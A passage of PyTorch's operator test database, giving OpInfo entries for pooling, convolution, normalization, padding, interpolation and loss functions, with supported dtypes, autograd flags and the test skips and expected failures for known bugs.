DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), )), OpInfo('aminmax', ref=lambda x, dim=None, keepdim=False: (np.amin(x, axis=dim, keepdims=keepdim), np.amax(x, axis=dim, keepdims=keepdim)), dtypes=all_types_and(torch.bool), dtypesIfCUDA=all_types_and(torch.bool, torch.float16, torch.bfloat16), decorators=(onlyNativeDeviceTypes,), supports_autograd=False, sample_inputs_func=sample_inputs_aminmax, error_inputs_func=error_inputs_aminmax_amax_amin, skips=( # AssertionError: Resizing an out= argument with no elements threw a resize warning! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cpu'), )), OpInfo('as_strided', op=lambda x, size, stride, storage_offset=0: torch.as_strided(x, size, stride, storage_offset=storage_offset), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, sample_inputs_func=sample_inputs_as_strided, skips=( # Note: This xfail is fine -- it's inherent to how as_strided works DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_noncontiguous_samples'), # AssertionError: False is not true : Scalars failed to compare as equal! 
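               # (The noncontiguous xfail above is inherent: as_strided indexes the
               # raw storage, so a noncontiguous copy of the "same" sample can
               # legitimately produce different values. A minimal sketch:
               # >>> torch.arange(6).as_strided((2,), (2,))
               # tensor([0, 2])  -- picks storage elements 0 and 2.)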
DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCommon', 'test_variant_consistency_eager'), # RuntimeError: This operator is not Composite Compliant DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCompositeCompliance', 'test_forward_ad'), # Not close DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestCommon', 'test_complex_half_reference_testing'), # Not close DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip("Errors when storage_offset is included"), 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.skip("Numerous errors"), 'TestGradients'))), OpInfo('as_strided_scatter', op=lambda x, src, size, stride, storage_offset=0: torch.as_strided_scatter(x, src, size, stride, storage_offset=storage_offset), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, sample_inputs_func=sample_inputs_as_strided_scatter, skips=( DecorateInfo(unittest.skip('Works only for CPU complex64'), 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.skip('Works for float64, fails for everything else'), 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.skip('Works for int64, fails for everything else'), 'TestCommon', 'test_noncontiguous_samples'), # noqa: B950 DecorateInfo(unittest.skip('Fails in most cases, passes on LAZY for some reason'), 'TestCommon', 'test_variant_consistency_eager'), # noqa: B950 DecorateInfo(unittest.skip('Only fails for LAZY, passes on everything else'), 'TestCompositeCompliance', 'test_backward'), # noqa: B950 DecorateInfo(unittest.skip('Passes on complex64 and float32 only'), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip('Fails on cuda + rocm'), 'TestCommon', 'test_complex_half_reference_testing'), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_grad'), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.skip('Passes on complex128 and float64 only'), 'TestGradients', 'test_fn_fwgrad_bwgrad'),)), OpInfo('nn.functional.cosine_similarity', aten_name="cosine_similarity", dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_cosine_similarity), OpInfo('nn.functional.adaptive_avg_pool1d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_avg_pool1d), OpInfo('nn.functional.adaptive_avg_pool2d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_avg_pool2d(Tensor input, int[2] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, int]'. 
: # File "<string>", line 3 # def the_method(i0): # return torch.nn.functional.adaptive_avg_pool2d(i0, (None, 7)) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_avg_pool2d), OpInfo('nn.functional.adaptive_avg_pool3d', dtypes=floating_types_and(torch.half), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_avg_pool3d(Tensor input, int[3] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, NoneType, NoneType]'. : # File "<string>", line 3 # # def the_method(i0): # return torch.nn.functional.adaptive_avg_pool3d(i0, (None, None, None)) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE # DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_avg_pool3d), OpInfo('nn.functional.adaptive_max_pool1d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_max_pool1d), OpInfo('nn.functional.adaptive_max_pool2d', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_max_pool2d(Tensor input, int[2] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, int]'. : # File "<string>", line 3 # def the_method(i0): # return torch.nn.functional.adaptive_max_pool2d(i0, (None, 7)) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_max_pool2d), OpInfo('nn.functional.adaptive_max_pool3d', dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), decorators=( # RuntimeError: # adaptive_max_pool3d(Tensor input, int[3] output_size) -> (Tensor): # Expected a value of type 'List[int]' for argument 'output_size' but # instead found type 'Tuple[NoneType, NoneType, NoneType]'. 
: # File "<string>", line 3 # # def the_method(i0): # return torch.nn.functional.adaptive_max_pool3d(i0, (None, None, None)) # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <--- HERE # DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # got: Batching rule not implemented for aten::flatten.using_ints check_batched_forward_grad=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_adaptive_max_pool3d), OpInfo('nn.functional.avg_pool1d', aten_name='avg_pool1d', supports_autograd=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_avgpool1d), OpInfo('nn.functional.avg_pool3d', aten_name='avg_pool3d', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_avgpool3d, skips=( # AssertionError: Tensor-likes are not close! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out', device_type='cpu'), )), OpInfo( "nn.functional.binary_cross_entropy_with_logits", aten_name="binary_cross_entropy_with_logits", supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_binary_cross_entropy_with_logits, skips=( DecorateInfo( unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,) ), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', "test_fn_gradgrad", dtypes=(torch.float64,)), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', "test_fn_fwgrad_bwgrad", dtypes=(torch.float64,)), ), ), UnaryUfuncInfo( 'nn.functional.relu', aten_name="relu", ref=lambda a: np.where(a <= 0, 0, a), supports_autograd=True, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_nn_activation_relu, supports_out=False, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('nn.functional.conv_transpose1d', aten_name='conv_transpose1d', aliases=('conv_transpose1d',), dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv_transpose1d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda')], skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":104, please report a bug to PyTorch. 
DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False,), OpInfo('nn.functional.conv_transpose2d', aten_name='conv_transpose2d', aliases=('conv_transpose2d',), dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv_transpose2d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda')], skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":104, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False,), OpInfo('nn.functional.conv_transpose3d', aten_name='conv_transpose3d', aliases=('conv_transpose3d',), dtypes=floating_types_and(torch.int64), dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv_transpose3d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda'), DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-04, rtol=1.3e-06), }), 'TestCommon', 'test_noncontiguous_samples', device_type='cuda')], skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":104, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped! 75029"), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), DecorateInfo(unittest.skip("Skipped! 75363"), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), DecorateInfo(unittest.skip("Skipped! RuntimeError: bias tensor has to be contiguous"), 'TestGradients', 'test_forward_mode_AD', device_type='cuda', active_if=TEST_WITH_ROCM), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', device_type='cuda', active_if=(not TEST_CUDNN)), ), supports_out=False,), OpInfo('nn.functional.conv1d', aliases=('conv1d',), aten_name='conv1d', dtypes=floating_and_complex_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.chalf, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_conv1d, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=( DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=1e-2)}), 'TestCommon', 'test_complex_half_reference_testing' ), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-3, rtol=1e-3)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', ), ), skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":103, please report a bug to PyTorch. 
DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Ref: https://github.com/pytorch/pytorch/issues/75309 # AssertionError: None mismatch: torch.complex128 is not None DecorateInfo(unittest.expectedFailure, 'TestDtypeCustomRules', 'test_custom_rules', dtypes=(torch.complex64, torch.complex128)), # Ref: https://github.com/pytorch/pytorch/issues/75309 # RuntimeError: UNSUPPORTED DTYPE: complex DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.complex64, torch.complex128)), # Ref: https://github.com/pytorch/pytorch/issues/78077 DecorateInfo(unittest.expectedFailure, 'TestExpandedWeightFunctional', 'test_expanded_weight_per_sample_grad', dtypes=(torch.float64,)), ), supports_expanded_weight=True, supports_out=False,), OpInfo('nn.functional.conv2d', aliases=('conv2d',), aten_name='conv2d', dtypes=floating_and_complex_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.chalf, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=partial(sample_inputs_conv2d), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=( DecorateInfo( toleranceOverride({torch.chalf: tol(atol=6e-2, rtol=5e-2)}), 'TestCommon', 'test_complex_half_reference_testing', ), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=1e-2)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', ), ), skips=( # RuntimeError: !lhs.isAliasOf(rhs)INTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":103, please report a bug to PyTorch. DecorateInfo(unittest.skip("Works on some configs!"), 'TestJit', 'test_variant_consistency_jit'), # Ref: https://github.com/pytorch/pytorch/issues/75309 # AssertionError: None mismatch: torch.complex128 is not None DecorateInfo(unittest.expectedFailure, 'TestDtypeCustomRules', 'test_custom_rules', dtypes=(torch.complex64, torch.complex128)), # RuntimeError: UNSUPPORTED DTYPE: complex DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.complex64, torch.complex128)), # Ref: https://github.com/pytorch/pytorch/issues/78077 DecorateInfo(unittest.expectedFailure, 'TestExpandedWeightFunctional', 'test_expanded_weight_per_sample_grad', dtypes=(torch.float64,)), ), supports_expanded_weight=True, supports_out=False,), OpInfo('nn.functional.group_norm', aten_name='group_norm', aliases=('group_norm',), ref=reference_group_norm, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ # RuntimeError: Cannot insert a Tensor that requires grad as a constant. # Consider making it a parameter or input, or detaching the gradient DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)) ], sample_inputs_func=sample_inputs_group_norm, supports_expanded_weight=True,), OpInfo('nn.functional.instance_norm', # no ref because instance_norm will often have numerical instability (large numbers or nan) dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, decorators=[ # RuntimeError: Cannot insert a Tensor that requires grad as a constant. 
# Consider making it a parameter or input, or detaching the gradient DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad', active_if=TEST_WITH_ROCM) ], sample_inputs_func=sample_inputs_instance_norm, supports_expanded_weight=True,), OpInfo('nn.functional.layer_norm', aten_name='layer_norm', aten_backward_name='layer_norm_backward', aliases=('layer_norm',), ref=reference_layer_norm, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, assert_jit_shape_analysis=True, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-05, rtol=1e-03)}), 'TestCommon', 'test_numpy_refs' ) ], sample_inputs_func=sample_inputs_layer_norm, supports_expanded_weight=True,), OpInfo('nn.functional.local_response_norm', dtypes=floating_types_and(torch.int64, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ], sample_inputs_func=sample_inputs_local_response_norm,), OpInfo('nn.functional.pad', variant_test_name='constant', aten_name='constant_pad_nd', supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='constant'), supports_out=False), OpInfo('nn.functional.pad', variant_test_name='reflect', supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types_and(torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='reflect'), skips=( # Doesn't have a corresponding aten operator. # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), ), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False), OpInfo('nn.functional.pad', variant_test_name='replicate', supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types_and(torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='replicate'), skips=( # Doesn't have a corresponding aten operator. # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. 
DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), ), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False), OpInfo('nn.functional.pad', variant_test_name='circular', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), sample_inputs_func=partial(sample_inputs_nn_pad, mode='circular'), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( # Doesn't have a corresponding aten operator. # RuntimeError: falseINTERNAL ASSERT FAILED at # "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32,)), ), supports_out=False), OpInfo('nn.functional.hardswish', aten_name="hardswish", aten_backward_name='hardswish_backward', supports_autograd=True, assert_autodiffed=True, sample_inputs_func=sample_inputs_hardswish, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_gradgrad=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, autodiff_nonfusible_nodes=["aten::hardswish"]), OpInfo('nn.functional.unfold', aten_name='im2col', aten_backward_name='im2col_backward', dtypes=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half), sample_inputs_func=sample_inputs_nn_unfold, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, skips=( # NOTE: this failure may not reproduce consistently on different systems # false INTERNAL ASSERT FAILED at "...torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185 DecorateInfo(unittest.skip("Internal assert failed!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='nearest', supports_autograd=True, supports_fwgrad_bwgrad=True, supports_forward_ad=True, dtypes=floating_types_and(torch.uint8, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.uint8), sample_inputs_func=partial(sample_inputs_interpolate, 'nearest'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='linear', supports_autograd=True, supports_fwgrad_bwgrad=True, supports_forward_ad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), sample_inputs_func=partial(sample_inputs_interpolate, 'linear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. 
DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='bilinear', supports_fwgrad_bwgrad=True, supports_autograd=True, supports_forward_ad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=partial(sample_inputs_interpolate, 'bilinear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='bicubic', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), sample_inputs_func=partial(sample_inputs_interpolate, 'bicubic'), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='trilinear', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=partial(sample_inputs_interpolate, 'trilinear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.interpolate', aten_name="interpolate", variant_test_name='area', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_interpolate, 'area'), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo('nn.functional.upsample_bilinear', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=partial(sample_inputs_upsample, 'bilinear'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. 
DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo( "nn.functional.soft_margin_loss", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, # doesn't support grad on target sample_inputs_func=partial(sample_inputs_loss, rhs_requires_grad=False), ), OpInfo('nn.functional.upsample_nearest', supports_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_types_and(torch.uint8, torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.uint8), gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=partial(sample_inputs_upsample, 'nearest'), skips=( # RuntimeError: false # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":185, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), supports_out=False), OpInfo( "nn.functional.margin_ranking_loss", ref=_NOTHING, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bfloat16, torch.float16), supports_out=False, sample_inputs_func=sample_inputs_margin_ranking_loss, error_inputs_func=error_inputs_margin_ranking_loss, reference_inputs_func=reference_inputs_margin_ranking_loss, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), )), OpInfo( "nn.functional.multi_margin_loss", ref=_NOTHING, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), supports_out=False, supports_gradgrad=False, sample_inputs_func=sample_inputs_multi_margin_loss, ), OpInfo( "nn.functional.multilabel_margin_loss", ref=_NOTHING, dtypes=floating_types(), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.float16), supports_out=False, supports_gradgrad=False, sample_inputs_func=sample_inputs_multilabel_margin_loss ), OpInfo('nn.functional.leaky_relu', aliases=None, aten_name="leaky_relu", aten_backward_name='leaky_relu_backward', sample_inputs_func=sample_inputs_leaky_relu, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_autograd=True, assert_autodiffed=True, supports_gradgrad=True, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_nonfusible_nodes=["aten::leaky_relu"]), OpInfo( "nn.functional.multilabel_soft_margin_loss", ref=_NOTHING, supports_out=False, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), sample_inputs_func=sample_inputs_multilabel_soft_margin_loss, supports_forward_ad=True, decorators=( DecorateInfo( toleranceOverride({torch.float32: tol(atol=1e-4, rtol=1e-4)}), "TestJit", "test_variant_consistency_jit", ), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), ), skips=( # AssertionError: False is not true : Scalars failed to compare as equal! 0 != 4096 # __main__.TestJitCUDA.test_variant_consistency_jit_nn_functional_multilabel_soft_margin_loss_cuda_float32 # leaked 4096 bytes CUDA memory on device 0 DecorateInfo( # Skip instead of expectedFailure because this fails # locally for me but passes in CI. 
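# (The outcome is environment-dependent, so a hard expectedFailure here
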